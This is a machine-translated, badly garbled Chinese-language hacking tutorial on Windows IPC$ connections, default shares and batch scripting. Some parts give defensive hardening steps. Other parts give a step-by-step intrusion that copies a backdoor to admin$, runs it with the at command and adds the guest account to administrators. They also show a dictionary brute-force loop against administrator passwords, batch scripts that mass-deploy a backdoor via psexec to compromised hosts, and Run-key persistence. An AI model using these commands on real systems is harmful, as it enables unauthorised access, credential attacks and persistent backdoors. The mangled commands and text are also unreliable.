The default share is to facilitate remote management of the default administrator to open the share (of course you can close it), that all of the logical drive (c $, d $, e $ ... ...) and the system directory winnt or windows (admin $), We can be achieved through the ipc $ connection sharing on these default access (provided that the other party does not close the default share). .


Five ipc $ connection failure.


The following five reasons are more common:. .


1) your system is not a NT or higher operating system;.


2) the other party does not open ipc $ default share. .


3) other unopened 139 or 445 port (to be firewall shielding).


4) your command input is incorrect (such as missing spaces, etc.). .


5) user name or password error (empty connection of course fine).


In addition, you can return the error number of reasons:. .


Error number 5, access denied: you use the users is not an administrator permissions, have elevated permissions;.


Error No. 51, Windows can not find the network path: Network problems;. .


Error number 53, the network path was not found: IP address error; target does not power on; target lanmanserver service did not start; target Firewall (port filtering).


Error No. 67, can not find the network name: Your lanmanworkstation service is not started; goals delete ipc $;. .


Error number 1219, the supplied credentials and already existing set of credentials: you and the other established an ipc $, delete again.


Error No. 1326, unknown user name or bad password: The reason is obvious;. .


Error number 1792, attempting to logon, but the Net Logon service is not started: target the Netlogon service is not started. (Connection to domain controller this occurs).


Error No. 2242, the user's password has expired: account policy objectives, mandatory periodic request to change your password. .


With regard to the ipc $ and not on the issue is more complex, in addition to the above reasons, there are other uncertainties, I was unable to ascertain in detail, we own experiences and tests.


6 How to open target IPC $ (paragraph quoted from article). .


First of all you need to get a does not depend on the shell of ipc $, such as SQL cmd extensions, telnet, Trojan horse, of course, the shell must be admin privileges, then you can use the shell to execute a command net share to open ipc $ ipc $ target. From the above you can see whether you can use ipc $, and there are many conditions. Verify that the related services are running, start it (don't know what to do please look at the net use command), or otherwise (such as a firewall, not kill) recommends to give up.


7 How to prevent ipc $ invasion. .


1 prohibit null connection enumeration (this does not preclude a null connection establishment, "Anatomy of a null session under win2000).


First run regedit, find the following form [HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ LSA] to RestrictAnonymous = DWORD keys read: 00000001 (if set to 2, then some problems will occur, such as a problem of some services such as WIN etc.). .


2 prohibit the default share.


1) This local shared resources. .


Run-cmd-enter net share.


2) Remove shared (one per input). .


net share ipc$ /delete 。.


net share admin $ / delete. .


net share c$ /delete 。.


net share d $ / delete (if e, f, ... ... you can continue to delete). .


3) server service is stopped.


net stop server / y (After restarting server services will re-open). .


4) modifying the registry.


Run-regedit. .


Server version: locate the following key [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters] the AutoShareServer key value (DWORD): 00000000 instead.


pro version: to find as the primary key [HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Services \ LanmanServer \ Parameters] to AutoShareWks (DWORD) of the key with the following: 00000000. .


If the above mentioned key does not exist, the newly created (right-click-New-double-byte value) of a primary key and then change the key values.


Permanently close the ipc $ 3 and the default shared services dependent: lanmanserver the server service. .


Control Panel-administrative tools-services-find server services (right click)-Properties-General-startup type-disabled.


4 Install a firewall (check the relevant settings), or the port filter (filter out 139,445, etc.), or master a new version of the optimization. .


5 sets of complex passwords, to prevent brute force password by ipc $.


VIII-related commands. .


1) to establish the connection: empty.


net use \ \ IP \ ipc $ "" / user: "" (we must note: This line of command includes three spaces). .


2) to establish a non-null connection:.


net use \ \ IP \ ipc $ "user name" / user: "password" (also has three spaces). .


3) map: default share.


net use z: \ \ IP \ c $ "password" / user: "User Name" (ie the other side of the c drive mapping for their own z-disk, other disks so on). .


If you have goals and ipc $, you can directly use IP + letter + $ access, use the command net: \\IP\c $ z.


4) Delete an ipc $ connection. .


net use \\IP\ipc$ /del 。.


5) remove the shared map. .


Net use c:/del delete mapped drive c, and other disk and so on.


net use * / del to delete all, there will be prompted to press y to confirm. .


Nine classic invasion mode.


The classic model is too invasive, and most have introduced ipc tutorial, I also Take over quoted in the original of this thanks! (Do not know who was the senior). .


11. C:\ > net use \\ .0 .0.127.. $ "password" .1\IPC/user: "username".


General use streamer, weak passwords to get through the scan, the administrator account and password. .


2. C:\>copy srv。.exe \\127。.0。.0。.1\admin$ 。.


First copy the srv. . Exe up in the passing of the Tools directory there (where $ is the admin user's c: \ winnt \ system32 \, you can also use c $, d $, which means C drive and D drive, which see you where you want to copy to go). .


。.


3. . C: \> net time \ \ 127. .0. .0. .1. .


Check the time and found 127. .0 .0. current time .1. is 6/15/2004 11: 00 am, the command completed successfully.


. .


4. C:\>at \\127。.0。.0。.1 11:05 srv。.exe 。.


Start with the at command srv. . Exe it. .


5. C:\>net time \\127。.0。.0。.1 。.


Then look up to the time yet? If the 127. .0. .0. .1 The current time is 2004/6/15 11:05 am, then ready to begin the following command. .


。.


6. . C: \> telnet 127. .0. .0. .1 99. .


Here a Telnet command, note the port is 99. The default is 23 Telnet port, but we are using a computer in each SRV as we build a 99 port Shell.


While we can Telnet go, but SRV is a one-time, next time you log still have to activate! Therefore, we intend to establish a Telnet service! This use to ntlm a. .


。.


7. . C: \> copy ntlm. . Exe \ \ 127. .0. .0. .1 \ Admin $. .


Use the Copy command to ntlm. .exe to the host (.exe is ntlm. in the Tools directory of the streamer ").


. .


8. C:\WINNT\system32>ntlm 。.


Enter ntlm start (where C: \ WINNT \ system32> refers to the other computer, run the ntlm is for this program running on the computer in the other). When the "DONE" when the note has started on normal. Then use "net start telnet" to open the Telnet service! . .


9. Telnet .0 .0.127.. .1, then enter a user name and password to access each other, the operation is just like in the DOS as easy to operate! (and then you want to do? want to do what they do, haha).


As a precaution, we then add the guest active management group. .


10. C:\>net user guest /active:yes 。.


Guest users will activate each other. .


11. C:\>net user guest 1234 。.


Guest password will be changed to 1234, or you want to set the password. .


12. C:\>net localgroup administrators guest /add 。.


Guest became the Administrator (if the administrator password to change, guest account did not change, the next time we can again use the guest access to this computer). .


Ipc $ FAQ.


1, how to establish air connections, what use is it? . .


A: use the command net use \IPipc $ ""/user: "", can be simply and goal establishing a null connection (requires target open ipc $).


For NT, the default security settings, use of space can give the target user to connect, share, access permissions for everyone to share, access to a small part of the registry, etc., nothing of value. Even less effect on the 2000. And not easy to achieve, need tools. .


2. Why do I even can't IPC $?.


A: 1. . Only nt/2000/xp and above systems can only be established ipc $. If you are using a 98/me is not the function. .


2. confirm that your order is not wrong. The correct command is: net use \ $ "target IPipc" password: "user name"/user.


Note that other more or less the space. When the user name and password does not contain spaces in double quotation marks when the two sides can be omitted. Empty password "" for. .


3, according to the returns the error number of reasons:.


Error No. 5, Access Denied: You may use the user is not administrator rights, the first upgrade rights;. .


Error number 51, Windows cannot find the network path: there may be a network problem;.


Error No. 53, can not find the network path: ip address error; target is not on; target lanmanserver service is not started; objectives of the firewall (port filtering);. .


Error number 67, could not find the network name: your lanmanworkstation service did not start; target ipc $; removed.


Error No. 1219, to provide credentials and an existing set of credentials to the conflict: the other side you have and set up a ipc $, please delete the link again. .


Error number 1326, unknown user name or bad password: obvious reasons;.


Error No. 1792, tried to log on, but the network logon service does not start: Target NetLogon service is not started. (Connects to the domain controller will appear in this case). .


Error number 2242, this user's password has expired: the account policies, the objectives of mandatory requirements to change your password.


4, on the ipc $ connection closed problem is rather complicated, does not sum up a unified understanding of the experiment in broiler sometimes come to conflicting conclusions, very difficult. And knows the problem, if no other alternatives to shell, a lot of the problem still remains. .


5, how to open the target of IPC $?.


A: First you need to get a ipc $ does not depend on the shell, such as the cmd extension sql, telnet, Trojans. Of course, this shell must be the admin permissions. Then you can use the shell execute a command net share ipc $ to an open goal ipc $. Know from the previous issue, ipc $ can use many conditions. Make sure that related services are running, did not start it (do not know how to see the net use command). Or not do so (such as a firewall, not kill) proposed to give up. .


6, how to map and access the default share?.


A: Use the command net use z: \ target IPc $ "password" / user: "User Name" will be the other side of the c drive mapping for their own z-disk, the other set forth. .


If you have goals and ipc $, you can directly use IP Plus letter plus $ access. For example, copy .exe \IPd muma.. $ pathmuma .exe. Or you can also map again, just do not have a username and password: net use y: \IPd $. Then copy .exe y:pathmuma muma.. .exe. When the path contains spaces, use full path "..


7, how to remove the mapping and ipc $ connection? . .


A: use the command net use \IPipc $/del delete and a target of ipc $ connection.


Use the command net use z: / del to delete mapping z disk, other disks so on. .


Use the command net use */del delete all. There will be a prompt to press y to confirm.


8, connected to the ipc $ and then I can do? . .


A: the account with administrator permissions to the destination connection successfully and ipc $, which means that you can do with each other's system in depth "exchanges". You can use a variety of command-line tools (such as pstools series, telnethack Win2000SrvReskit, etc.) to obtain objective information, management processes and services, etc. If the goal of opening up the default shared (not open and you'll help him released), you can upload Trojans and run. You can also use tftp, ftp upload option. As dwrcc, VNC, RemoteAdmin other tools (Trojan) also has direct control screen functions. If 2000server, open the Terminal Services can also be considered to facilitate control. The use of tools mentioned here, see the note or the related tutorial own. .


9, how to prevent others using ips $ and default share intrusion me?.


Answer: A, one way is to share ipc $ and default are deleted. But after the restart there will be. This needs to change the registry. .


1, first delete the existing.


net share ipc $ / del. .


net share admin$ /del 。.


net share c $ / del. .


... ... ... ... (There are several delete several).


2, forbidden to air link. .


First, run regedit, locate the following key [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLSA] the RestrictAnonymous key value (DWORD): 00000002 instead.


   3, prohibiting automatically open the default share. .


For the server Edition, locate the following key [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters] the AutoShareServer key value (DWORD): 00000000 instead.


For the pro version, it is [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters] to AutoShareWks (DWORD) of the key with the following: 00000000. .


If the above mentioned key does not exist, create a new key value to be changed.


B, the other is closed and the default ipc $ share the dependent services (not recommended). .


net stop lanmanserver 。.


May be prompted to say, XXX service will close it to continue. Because there are some minor service depends on the lanmanserver. General by y to continue on it. .


C, the simplest way is to set up a complex password, to prevent brute force password by ipc $. But if you have any other vulnerabilities, ipc $ will provide convenience for further invasion.


D, there is a way to install a firewall or port filtering. .


A simple batch processing tutorial:.


Batch command, if used properly, powerful no one can beat us! Do not want to learn the, from today I will order one after another batch of the popular introduction to you, what if we do not know where to write comments :. .


Batch file is an unformatted text file that contains one or more commands. It's a file extension of .bat or .cmd... At the command prompt, type the name of the batch file, or double-click the batch file, the system calls the Cmd. file .exe all commands in the order in which they appear to run them one by one.


1. . Simple internal command batch profile. .


1. .Echo command.


Echo request to open or close the echo function, or display messages. If no parameters, echo command will display the current echo setting. .


Syntax.


echo [(on off)] [message]. .


Sample:@echo off / echo hello world 。.


In practice, we will have the command and redirect symbols (also called the pipe symbol, usually with ">>>) combined to achieve some of the command input to a specific format of the file. . This will be reflected in future cases. .


2. @ command.


Said they did not show @ the back of the order in the invasion process (such as the use batch to format the hard disk enemy) naturally can not let you use other commands to see friends. .


Sample:@echo off 。.


@ Echo Now initializing the program, please wait a minite .... .


@ X:/q/u/autoset format (format of this command is not able to use the/y parameter, the good news is that Microsoft got autoset the parameters, effects and/y is the same. ) 。.


3. . Goto command. .


Specifies the jump to the label, the label is found, the program will be processed on the next line start.


Syntax: goto label (label is a parameter, specify the batch process to move the line.). .


Sample: 。.


if (% 1 }=={} goto noparms. .


If the {% 2} == {} goto noparms (if here if,% 1,% 2, then you do not understand the first vaulted, followed by a detailed explanation. ) 。.


@ Rem check parameters if null show usage. .


:noparms 。.


echo Usage: monitor. . Bat ServerIP PortNumber. .


goto end 。.


The name tag can be played casually, but the best sense of the letter of the matter, plus months before the letter: This letter is used to indicate labels, goto command is the basis of this: to find the next jump to get there. Some of the best shows so that you people will understand your intentions seem ah. .


4. .Rem command.


Note command, in the C language fairly and /*---*/, it will not be executed, just a comment from the role, to facilitate other people to read and modify your own future. .


Rem Message 。.


Sample: @ Rem Here is the description. .


5. .Pause command.


Run Pause command, will display the following message:. .


Press any key to continue 。.


Sample:. .


@echo off 。.


: Begin. .


copy a:*。.* d:\back 。.


echo Please put a new disk into driver A. .


pause 。.


goto begin. .


In this example, on the disk in drive a, all the files are copied to the d:\back. Displays the comment prompted another disk in drive A, the pause command suspends so you replace the disk, and then press any key to continue.


6. . Call command. .


Calls one batch program from another without stopping the parent batch program. Call the command accepted calls the target labels. If a script or batch file, use the Call, it will not work in the command line.


Syntax. .


call [[Drive:][Path] FileName [BatchParameters]] [:label [arguments]] 。.


Parameters. .


[Drive:} [Path] FileName 。.


Batch program to call the specified location and name. filename parameter must have. . Bat or. . Cmd extension. .


7. .start.


Call external programs, all DOS commands and command-line programs can be invoked by the start command. .


Invasion: common parameters.


MIN Start window minimized when. .


SEPARATE in separate spaces start 16-bit Windows program.


HIGH in the HIGH priority class of the application. .


REALTIME in the REALTIME priority class to start the application.


WAIT Start application and wait for it to end. .


These parameters are passed to the command/program parameters.


Implementation of the application is 32 - bit GUI application, CMD. . EXE applications ranging from termination to return to the command prompt. If implemented within the command script, the new behavior does not occur. .


8. .choice command.


choice to use this command allows the user to enter a character to run different commands. Use should be added / c: parameter, c: writing prompts can be entered after the character, no spaces between. It is the return code is 1234 ... .... .


Such as: choice/c: dme defrag, mem, end.


Will be displayed. .


defrag,mem,end[D,M,E]? 。.


Sample:. .


The content of the Sample. .bat as follows:.


@ Echo off. .


choice /c:dme defrag,mem,end 。.


if errorlevel 3 goto defrag (the highest value should first check the error code). .


if errorlevel 2 goto mem 。.


if errotlevel 1 goto end. .


:defrag 。.


c: \ dos \ defrag. .


goto end 。.


: Mem. .


mem 。.


goto end. .


:end 。.


echo good bye. .


This file will be displayed after you run defrag, mem, end [D, M, E]? Users can select d m e, then the if statement will make judgments, d to execute programs labeled defrag, m represents the implementation of the program labeled mem, e to execute the program labeled end segment, each segment to goto the end end end the program to jump to the label, and then the program will display a good bye, end-of-file.


9. . If the command. .


If that will determine whether or not to comply with the prescribed conditions, thus decided to execute different commands. There are three formats:.


1, if "parameters" == "string" command to be executed. .


If the parameter is equal to the specified string, the conditions are true, run the command, otherwise you run the next sentence. (Note that the two equal sign).


As if "% 1" == "a" format a:. .


if {%1}=={} goto noparms 。.


if (% 2 }=={} goto noparms. .


2. if the pending exist filename command.


If the specified file, then the conditions hold, run the command, or run the next one. .


As if config .sys exist. edit config. .sys.


3, if errorlevel / if not errorlevel number command to be executed. .


If the return code is equal to the specified number, the conditions are true, run the command, otherwise you run the next sentence.


As if errorlevel 2 goto x2. .


DOS program to run when a number is returned to the DOS errorlevel, known as the error code or return codes, and common return codes are 0, 1.


10. . For the command. .


For the command is a more complicated commands, mainly for the parameter in the specified scope, which is executed the command.


In a batch file using FOR command, specify the variable, use%% variable. .


for {%variable|%%variable} in (set) do command [ CommandLineOptions] 。.


% Variable to specify a single letter replaceable parameter. .


(Set) specifies that one or a group of files. You can use a wildcard character.


command specifies the command to execute on each file. .


Command-parameters for specific command to specify a parameter or a command line switch.


In a batch file using FOR command, specify the variable, use%% variable. .


Instead of using the% variable. Variable names are case-sensitive, so% I, unlike% I..


If command extensions are enabled, the following additional FOR command format will be. .


Support:.


FOR / D% variable IN (set) DO command [command-parameters]. .


If set contains wildcards, you specify a directory name matching, not with the file.


Name matching. .


FOR /R [[drive:]path] %variable IN (set) DO command [command- 。.


Check to [drive:] path as the root of the directory tree, point to each directory. .


FOR the statement. If you do not specify the/R, you use the current directory.


Directory. If you set only a single point (..) Character, then enumerate the directory tree. .


FOR /L %variable IN (start,step,end) DO command [command-para 。.


Incremental form of the set that from the beginning to the end of a sequence of numbers. .


Thus, (1, 1, 5) generates the sequence 1 2 3 4 5 and (5,-1,1) will produce.


Sequence (54 321). .


FOR /F ["options"] %variable IN (file-set) DO command 。.


FOR / F ["options"]% variable IN ("string") DO command. .


FOR /F ["options"] %variable IN (‘command’) DO command 。.


Or, if there usebackq options:. .


FOR /F ["options"] %variable IN (file-set) DO command 。.


FOR / F ["options"]% variable IN ("string") DO command. .


FOR /F ["options"] %variable IN (‘command’) DO command 。.


filenameset for one or more file names. Continue to filenameset in. .


The next file, each file has been opened, read and processed.


Processing includes reading the file, and divided them into the text line by line, and then each line. .


Resolves to zero or more symbols. And then using the symbols found string variable values.


Call For loop. By default, / F through each line in each file separately. .


In the first blank symbol. Skip blank lines. You can specify an optional "options".


Parameters override the default parsing. The string with quotation marks, including one or more. .


To specify different parsing options keywords. These keywords are:.


eol = c - means the end of a line comment character (for one). .


Skip = n – refers to the file at the start of the number of rows are ignored.


delims = xxx - means the separator set. This replaces the spaces and tabs key. .


The default delimiter set.


tokens = x, y, mn - which refers to a symbol of each line is passed to each iteration. .


That for itself. This will result in additional variable names.


A range format. Nth symbol specified by m. .


The symbol string of asterisks, the last character.


Then the additional variable in the final analysis of a symbol. .


Distribution and accept line reservations text..


usebackq - New syntax has been specified using the following types of cases:. .


In order to perform a post as a quoted string and. ..


Quotation mark characters as a text string command and allows the fi. .


Use double quotes in the extended from the file name.


sample1:. .


FOR /F “eol=;;; tokens=2,3* delims=, ” %i in (myfile。.txt) do command 。.


Council of myfile. . Txt in each row, ignoring lines that begin with a semicolon would. .


Each row in the second and third symbol passed for the program; and/or a comma.


Number space delimiter. Please note that this body of statements for procedure reference% i to. .


To obtain the second symbol, j to obtain references% third symbol references% k..


After the third sign to get all the remaining symbols. With space for documents. .


Name, you need to use double quotes to enclose the file name. In order to make.


Double quotation marks, you need to use usebackq option, otherwise, double quotation marks will be. .


Be understood to be used to define a string to be analyzed.


% I get special instructions in the for statement,% j and% k is through. .


Tokens = option is designed to get instructions. You can use the tokens = line.


Specify up to 26 symbols, as long as no attempt to explain a higher than the letter 'z' or. .


The ' Z ' variable. Remember, FOR a variable is a single letters, case and global;.


At the same time can not have more than 52 are in use. .


You can also use the adjacent strings FOR/F analysis of logic by.


Single quotation marks to enclose filenameset between brackets. In this way, the characters. .


String will be treated as a file in a single input line.


Finally, you can use the FOR / F command to analyze the command's output. Is to be. .


The filenameset between the parentheses into an enclosed string. The string is.


Used as the command line, passing to a sub-CMD. . EXE, the output will be arrested and brought into. .


Memory, and is treated as a file analysis. Therefore, the following examples:.


FOR / F "usebackq delims =="% i IN (`set`) DO @ echo% i. .


Enumerates the current environment, the environment variable name.


In addition, FOR variable references has been enhanced replacement. You can now use the following. .


Option syntax:.


~ I - Remove any quotes ("), to expand% I..


% ~ FI – I will expand to one percent of the fully qualified path name.


% ~ DI - only the% I expanded to a drive letter. .


% ~% PI – only to a path I expansion.


% ~ NI -% I will only expand to a file name. .


% ~ XI – only the% I expanded to a file name extension.


% ~ SI - expanded path contains short names only. .


% ~% AI – I expanded to file properties.


% ~ TI -% I would be expanded to document the date / time. .


% ~ ZI –% I expanded to the size of the file.


% ~ $ PATH: I - Find out the directory in the path environment variable, and% I expansion. .


To found the first fully-qualified name. If the environment variable.


Is not defined, or not locate the file, this key combination will be expanded. .


An empty string.


Multiple modifiers can be combined to get results:. .


% ~ DpI – only the% extend to a I drive letter and paths.


% ~ NxI -% I will only expand to a file name and extension. .


% ~ FsI – only the% extend to one I with the full pathname of the short name.


% ~ Dp $ PATH: i - Find out the directory in the path environment variable, and% I expansion. .


To found the first drive letter and paths.


% ~ FtzaI -% I would like to expand to the output line DIR. .


In the above example,% PATH I and other valid values instead. % ~ Syntax.


With a valid FOR variable name terminated. Similar% I select the uppercase variable name. .


More readable and avoid and no case of key combinations that confusion.


These are the official MS help, let's give some examples to explain For specific command in the invasion purposes. .


sample2: 。.


For the command use to achieve a target of violence Win2k host password cracking. .


We use net use \\ip\ipc $ "," password: "administrator,"/u to try this and destination hosts connections, when successful, make a note of the password.


The main command is one: for / fi% in (dict.. Txt) do net use \ \ ip \ ipc $ "i%". .


/u:”administrator” 。.


I% used to represent the admin password, in the dict. . Txt i% in the value of this check with the net use command to connect. And then run the results passed to the find command -. .


for /f i%% in (dict。.txt) do net use \\ip\ipc$ “i%%” 。.


/ U: "administrator" | find ": the command completed successfully">> D: \ ok. . Txt, so that ko the. .


sample3: 。.


Have you had the hands of a large number of chickens waiting to be kind of backdoor + Trojans do? When the number of special and more often, had a very happy thing will become very depressed:). Article begins by talking about using a batch file, you can simplify routine or repetitive tasks. So how then? Oh, imagine what you'll see. .


The main commands are also only (in the batch file to use FOR the command, the specified variable use%% variable).


@ For / f "tokens = 1,2,3 delims ="%% i in (victim.. Txt) do start call door. . Bat. .


%%i %%j %%k 。.


the use of tokens, see above sample1, where it said the order would be victim. . Txt in content delivery to the door. . Bat in the parameters% i% j% k. .


And cultivate. .bat does use the net use command to establish a connection to the IPC $, and Backdoor Trojans + copy to the victim, then the return code (If used.


errorlever =) to filter the success of the back door of the host plant, and echo out, or echo to the specified file. .


Delims = vivtim. .txt are separated by a space. I would like to see here, you will certainly understand that this victim. .txt in the what kind of content. I should be based on the%%.


%% J%% k that objects to arrange, the general is ip password username. .


Code: embryonic form.


----- Cut here then save as a batchfile (I call it main.. Bat). .


————————— 。.


@ Echo off. .


@if “%1″==”" goto usage 。.


@ For / f "tokens = 1,2,3 delims ="%% i in (victim.. Txt) do start call. .


IPChack。.bat %%i %%j %%k 。.


@ Goto end. .


:usage 。.


@ Echo run this batch in dos modle. . Or just double-click it. .


:end 。.


----- Cut here then save as a batchfile (I call it main.. Bat). .


————————— 。.


------- Cut here then save as a batchfile (I call it door.. Bat). .


—————————– 。.


@ Net use \ \% 1 \ ipc $% 3 / u: "% 2". .


@if errorlevel 1 goto failed 。.


@ Echo Trying to establish the IPC $ connection ... ... ... ... OK. .


@copy windrv32。.exe\\%1\admin$\system32 && if not errorlevel 1 echo IP %1 。.


USER% 2 PWD% 3>> ko. . Txt. .


@psexec \\%1 c:\winnt\system32\windrv32。.exe 。.


@ Psexec \ \% 1 net start windrv32 & & if not errorlevel 1 echo% 1 Backdoored. .


>>ko。.txt 。.


: Failed. .


@echo Sorry can not connected to the victim。.


------ Cut here then save as a batchfile (I call it door.. Bat). .


——————————– 。.


This is only a prototype automated batch plant back door, two batch and backdoors (Windrv32.. Exe), PSexec. . Exe need to be placed under the unified directory. . Batch content. .


There is an extensible, for example: to clear the log + DDOS capabilities, add a user to join the regular features, better is the automatic transmission feature (worms). here is more narrative, interested friends can study.


2. . How to use parameters in a batch file. .


You can use parameters in a batch, General from 1% to 9% in the nine, when more than one parameter is required when using shift to move, this situation is rare, we would not consider it.


sample1: fomat. . Bat. .


@echo off 。.


if "% 1" == "a" format a:. .


:format 。.


@ Format a: / q / u / auotset. .


@echo please insert another disk to driver A。.


@ Pause. .


@goto fomat 。.


This example is used to format a few floppy disks continuously, so the time required to use the dos window input fomat. . Bat a, Oh, if a bit superfluous a ~ ^ _ ^. .


sample2: 。.


When we create a IPC $ connection to the total time to enter the long list of commands, Nong Buhao the wrong, so we would be better to write a batch of some fixed order, the chickens to ip password. .


Username in the presence of parameters to the batch, so you don't have to hit command every time.


@ Echo off. .


@ Net use \\1%\ipc $/u "2%": "3%" Note well, this PASSWORD is the second parameter.


@ If errorlevel 1 echo connection failed. .


How to use parameters is relatively simple? you are so cute how ^ _ ^. .3.. .No.


3. . How to use the combination of command (Compound Command). .


1。.& 。.


Usage: The first order & second order [& third command. .]. .


In this way can concurrently execute multiple commands, regardless of whether the command succeeded.


Sample:. .


C:\>dir z: & dir c:\Ex4rch 。.


The system cannot find the path specified. .


Volume in drive C has no label。.


Volume Serial Number is 0078-59FB. .


Directory of c:\Ex4rch 。.


2002-05-14 23:51. .





2002-05-14 23: 51.





2002-05-14 23:51 14 sometips. . Gif. .


2。.&& 。.


Usage: the first command & & second order [& & third command. .]. .


In this way can the simultaneous execution of multiple command encountered an error when executing the command will not perform the subsequent command, if there has been no error has been executed; all command.


Sample:. .


C:\>dir z: && dir c:\Ex4rch 。.


The system cannot find the path specified. .


C:\>dir c:\Ex4rch && dir z: 。.


Volume in drive C has no label. .


Volume Serial Number is 0078-59FB 。.


Directory of c: \ Ex4rch. .


2002-05-14 23: 55.





2002-05-14 23:55. .





2002-05-14 23:55 14 sometips。.gif 。.


1 File (s) 14 bytes. .


2 Dir(s) 768,671,744 bytes free 。.


The system cannot find the path specified. .


When doing backup might use this command to be relatively simple, such as:.


dir file: / / 192. .168. .0. .1/database/backup. . Mdb & & copy. .


file://192。.168。.0。.1/database/backup。.mdb E:\backup 。.


If there is a remote server backup. . Mdb file, on the implementation of the copy command, if not the implementation of the existence of the file copy command. This usage can be replaced IF exist a:). .


3。.|| 。.


Usage: the first command | | second command [| | Third Order. .]. .


In this way can the simultaneous execution of multiple command encountered when executing the correct command will not perform the subsequent command, if not the correct command has been executed; all command.


Sample:. .


C:\Ex4rch>dir sometips。.gif || del sometips。.gif 。.


Volume in drive C has no label. .


Volume Serial Number is 0078-59FB 。.


Directory of C: \ Ex4rch. .


2002-05-14 23:55 14 sometips。.gif 。.


1 File (s) 14 bytes. .


0 Dir(s) 768,696,320 bytes free 。.


Combination of command example:. .


sample: 。.


@ Copy trojan. . Exe \ \% 1 \ admin $ \ system32 & & if not errorlevel 1 echo IP% 1. .


USER %2 PASS %3 >>victim。.txt 。.


Fourth, the use of pipeline command. .


1. |.


Usage: the first command | the second command [| Third Order. .]. .


The first result as the second command parameters to use, remember that UNIX is very common in this way.


sample:. .


time /t>>D:\IP。.log 。.


netstat-n-p tcp | find ": 3389">> D: \ IP. . Log. .


start Explorer 。.


To see what it is? For Terminal Services allows us to process user-defined starting to realize that allows users to run the following bat, to get the logged-on user's IP. .


2. >, > > output redirection command.


Will be a command or a program output redirection to a specific file,> and. .


> > The difference is that the original transfer > clears the contents of the file to write to the specified files, after but > > append only to the specified file, but does not change its contents.


sample1:. .


echo hello world>c:\hello。.txt (stupid example?) 。.


sample2:. .


Popularity among the DLL Trojans, we know the system32 is a good place to hide and seek, many Trojans are sharpened head drill, DLL where the horse is no exception, for which we can install the system and the necessary application, on the exe and DLL files for a record ?.


Change directory to run the CMD-system32-dir *. . Exe> exeback. . Txt & dir *. . Dll> dllback. . Txt,. .


In this way all the exe and dll file names are recorded to .txt and dllback exeback.. .txt,.


In the future if unusual in the traditional way, but can not find the problem, not the system will have to consider is the Trojans have been sneaked into a DLL. .


When we use the same command to system32 of exe and dll files into another exeback1. .txt and dllback1. .txt, then run:.


CMD-fc exeback. . Txt exeback1. . Txt> diff. . Txt & fc dllback. . Txt. .


dllback1。.txt>diff。.txt。. (Comparison with the FC command twice before and after the DLL and EXE files, and the results are entered into the diff. .txt), so that we can find some extra DLL and EXE files, and then look at creation time, version, is compressed, and so on can be relatively easy to figure out it's been DLL Trojans. Not the best, if any, are not directly DEL off, first with regsvr32.


/ U trojan. . Dll DLL files will be written off the back door, then move it to the Recycle Bin where, if the system is not abnormal to reflect thoroughly then remove or submitted to the antivirus software company. .


3. < 、>& 、<& .


< 从文件中而不是从键盘中读入命令输入。
> & A handle to write output to the input of another handle. .


<& 从一个句柄读取输入并将其写入到另一个句柄输出中。
These are not commonly used, it does not do a presentation.


No. .5. .


5. how to use a batch file to manipulate the registry.


Back in the invasion process often operate the registry key to achieve certain specific purposes, such as: To hide the backdoor, Trojan horse programs and remove the Run key under the residual. Or create a service to load the back door. Of course, we will modify the registry to change the system reinforcement system or a property, these will require the operation of the registry have a certain understanding. Here we will first learn about how to use. . REG file to operate the registry. . (We can use batch processing to generate a REG file). .


On the registry operations, common is to create, modify, delete.


1. . Create. .


Create is divided into two kinds, one kind is to create a subkey (Subkey).


We create a file, reads as follows:. .


Windows Registry Editor Version 5。.00 。.


[HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ hacker]. .


And then execute the script, you are already under the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft created a name for the "hacker" subkey.


Another is to create a project name. .


This file format is a typical file formats, and you export the file format, as follows:.


Windows Registry Editor Version 5. .00. .


[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 。.


"Invader" = "Ex4rch". .


“Door”=C:\\WINNT\\system32\\door。.exe 。.


"Autodos" = dword: 02. .


Thus, under the [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run].


Newly built: Invader, door, about three projects. .


Invader type is "String Value".


door of the type "REG SZ Value". .


Autodos is of type DWORD Value ".".


2. . Changes. .


Modify a relatively simple, as long as you need to modify the project to export, and then modify it by using Notepad, and then import (regedit/s).


3. . Delete. .


We first of all, that deleting a project name, we create a file as follows:.


Windows Registry Editor Version 5. .00. .


[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 。.


"Ex4rch" =-. .


Execute the script, [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] under "Ex4rch" is deleted;.


We look to delete a sub-item, we create a script as follows:. .


Windows Registry Editor Version 5。.00 。.


[-HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Run]. .


Execute the script, [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] has already been deleted.


I believe that here. . Reg file you basically have mastered. So now the goal is to use batch processing to create specific content. . Reg file, and remember that we said earlier the use of redirection symbols can easily create a specific type of file. .


Samlpe1: If the above example, if you want to generate the following registry file.


Windows Registry Editor Version 5. .00. .


[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 。.


"Invader" = "Ex4rch". .


“door”=hex:255 。.


"Autodos" = dword: 000000128. .


You only need this:.


@ Echo Windows Registry Editor Version 5. .00>> Sample. . Reg. .


@echo 。.


[HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Run]> Sample. . Reg. .


@echo “Invader”=”Ex4rch”>>Sample。.reg 。.


@ Echo "door" = 5>> C: \ \ WINNT \ \ system32 \ \ door. . Exe>> Sample. . Reg. .


@echo “Autodos”=dword:02>>Sample。.reg 。.


samlpe2:. .


